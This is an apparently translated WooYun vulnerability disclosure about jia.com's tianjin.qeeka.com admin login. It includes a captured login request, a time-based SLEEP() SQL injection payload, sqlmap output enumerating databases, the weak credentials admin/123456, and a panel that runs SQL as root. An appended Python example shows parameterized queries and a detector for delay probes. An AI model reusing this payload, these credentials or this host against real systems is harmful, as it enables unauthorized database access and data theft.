
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0130395

Title: 齐家网 (jia.com) important system: root-privilege SQL injection + weak password (SQL statements can be executed directly)

Vendor: jia.com

Author: 路人甲

Submitted: 2015-07-30 12:19

Fixed: 2015-08-04 12:20

Disclosed: 2015-08-04 12:20

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 16

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-30: details sent to the vendor, awaiting vendor handling
2015-08-04: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

WooYun-jun, you wouldn't happen to be a girl, would you?? So naughty.

Detailed description:

[image: 10.png]

[image: 11.png]


WooYun-jun, tell me quickly whether you are a girl (also, aren't 齐家 and qeeka homophones??)

http://tianjin.qeeka.com/admin.jsp

Capture the login request:

POST /admin.jsp?run-login/login-show-json-ajax-1 HTTP/1.1
Host: tianjin.qeeka.com
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://tianjin.qeeka.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://tianjin.qeeka.com/admin.jsp?show-login/login-layout-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: IPLOC=CN4400; SUV=1507272131420486; ssl=false; JSESSIONID=D7EAD746DFA35CC675B49094864A4F89; BAIDU_DUP_lcr=https://www.baidu.com/link?url=jVhSOrrCSblqpNdM6fjxKU5sAUcm1Q4yHR_vFFAEmxRTzvKKnJOJ4AiIgAnuUg9d&wd=&eqid=9dcb644f000017400000000255b97e39

login%5Busername%5D=admin&login%5Bpassword%5D=admin&login%5BappId%5D=mzmf

The name parameter (login[username]) is injectable.

[image: 1.png]

[image: 2.png]

sqlmap runs very slowly here, so first take a look at the weak password: admin/123456

[image: 3.png]

[image: 4.png]

The timestamps are current. Looking at the features: under Service Design there are many functions, so let's click on the diagram and see.

[image: 6.png]

[image: 7.png]

Many nodes are visible; double-clicking one brings up the node control panel, from which SQL statements can be executed.

[image: 8.png]

[image: 9.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: login[username] (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: login[username]=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))lLy ND 'lgZA'='lgZA&login[password]=admin&login[appId]=mzmf
---
[09:41:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[09:41:20] [INFO] fetching database names
[09:41:20] [INFO] fetching number of databases
[09:41:20] [WARNING] time-based comparison requires larger statistical model ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (opt '--time-sec')? [Y/n] y
[09:41:42] [WARNING] it is very important not to stress the network adapter ng usage of time-based payloads to prevent potential errors
[09:41:54] [INFO] adjusting time delay to 3 seconds due to good response tim 6
[09:41:55] [INFO] retrieved:
[09:42:19] [ERROR] invalid character detected. retrying..
[09:42:19] [WARNING] increasing time delay to 4 seconds in
[09:43:18] [ERROR] invalid character detected. retrying..
[09:43:18] [WARNING] increasing time delay to 5 seconds form
[09:45:31] [ERROR] invalid character detected. retrying..
[09:45:31] [WARNING] increasing time delay to 6 seconds
[09:45:54] [ERROR] invalid character detected. retrying..
[09:45:54] [WARNING] increasing time delay to 7 seconds a
[09:46:51] [ERROR] invalid character detected. retrying..
[09:46:51] [WARNING] increasing time delay to 8 seconds tion_sc
[09:51:44] [ERROR] unable to properly validate last character value ('i').. iema
[09:52:30] [ERROR] invalid character detected. retrying..
[09:52:30] [WARNING] increasing time delay to 4 seconds
[09:52:32] [INFO] retrieved: commonservice
[09:59:26] [INFO] retrieved:
[10:00:02] [ERROR] invalid character detected. retrying..
[10:00:02] [WARNING] increasing time delay to 5 seconds mac
[10:01:31] [ERROR] invalid character detected. retrying..
[10:01:31] [WARNING] increasing time delay to 6 seconds dat
[10:03:24] [ERROR] invalid character detected. retrying..
[10:03:24] [WARNING] increasing time delay to 7 seconds
[10:03:52] [ERROR] invalid character detected. retrying..
[10:03:52] [WARNING] increasing time delay to 8 seconds
[10:04:30] [ERROR] unable to properly validate last character value ('{').. {
[10:04:35] [INFO] retrieved: m
[10:05:14] [ERROR] invalid character detected. retrying..
[10:05:14] [WARNING] increasing time delay to 4 seconds
[10:05:43] [ERROR] invalid character detected. retrying..
[10:05:43] [WARNING] increasing time delay to 5 seconds ysql
[10:07:26] [INFO] retrieved:
[10:07:55] [ERROR] invalid character detected. retrying..
[10:07:55] [WARNING] increasing time delay to 6 seconds
[10:08:36] [ERROR] invalid character detected. retrying..
[10:08:36] [WARNING] increasing time delay to 7 seconds
[10:09:23] [ERROR] invalid character detected. retrying..
[10:09:23] [WARNING] increasing time delay to 8 seconds secu
[10:12:22] [ERROR] unable to properly validate last character value ('y').. y
[10:12:41] [ERROR] invalid character detected. retrying..
[10:12:41] [WARNING] increasing time delay to 4 seconds i

[image: 9.png]

The database connection runs with root privileges.
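The following Python is an added illustration, not code from this report or from the jia.com system (whose real login code behind admin.jsp is unknown). It models the login handler two ways: a string-concatenated query, where the username text becomes part of the SQL grammar and a probe whose condition is true or false flips the result (the same inference sqlmap drives with SLEEP() delays above), and a parameterized query, where the identical probe is inert because the driver binds it as data. It also parses the report's own POST body and flags the time-delay form seen in the sqlmap payload. The in-memory SQLite database, the admin_user table and its columns are constructed assumptions; SQLite has no SLEEP(), so the probe here is boolean rather than time-based.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Body of the captured login request from the report (URL-encoded form fields).
REQUEST_BODY = "login%5Busername%5D=admin&login%5Bpassword%5D=admin&login%5BappId%5D=mzmf"


def setup_db():
    """Constructed stand-in for the admin user table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin_user VALUES ('admin', 'admin')")
    return conn


def parse_login_body(body):
    """Decode login[username] / login[password] from the form body."""
    fields = parse_qs(body)
    return fields["login[username]"][0], fields["login[password]"][0]


def login_vulnerable(conn, username, password):
    """Concatenation: a quote in the username closes the literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM admin_user WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Bound parameters: the values never touch the SQL text, so no injection is possible."""
    sql = "SELECT username FROM admin_user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def probe_results(conn):
    """Blind-injection inference: does the outcome track an injected condition?"""
    true_probe = "admin' AND '1'='1"   # constructed boolean probe, stands in for SLEEP(5)
    false_probe = "admin' AND '1'='2"
    return {
        # Vulnerable handler: (True, False), the outcome leaks the condition's truth value.
        "vulnerable": (login_vulnerable(conn, true_probe, "admin"),
                       login_vulnerable(conn, false_probe, "admin")),
        # Parameterized handler: (False, False), no such username exists, nothing leaks.
        "parameterized": (login_parameterized(conn, true_probe, "admin"),
                          login_parameterized(conn, false_probe, "admin")),
    }


TIME_PROBE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def looks_like_time_probe(field_value):
    """Detection hint for a WAF or log review: MySQL delay functions in a login field."""
    return TIME_PROBE.search(field_value) is not None


if __name__ == "__main__":
    db = setup_db()
    user, pw = parse_login_body(REQUEST_BODY)
    print("legitimate login, vulnerable:", login_vulnerable(db, user, pw))
    print("legitimate login, parameterized:", login_parameterized(db, user, pw))
    print("probe results:", probe_results(db))
    print("sqlmap-style username flagged:",
          looks_like_time_probe("admin' AND (SELECT * FROM (SELECT(SLEEP(5)))x AND 'a'='a"))
```

The parameterized query is the fix for the injection itself; the root-privilege finding is a separate problem, since the application's database account should be a least-privilege user so that an injection, or the node panel's SQL-execution feature, cannot reach other schemas such as mysql or information_schema.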

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vendor response

Vendor reply:

Severity: no impact, vendor ignored

Ignored at: 2015-08-04 12:20

Vendor comment:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

2015-08-17: Thank you very much for your attention to our website; we will keep improving.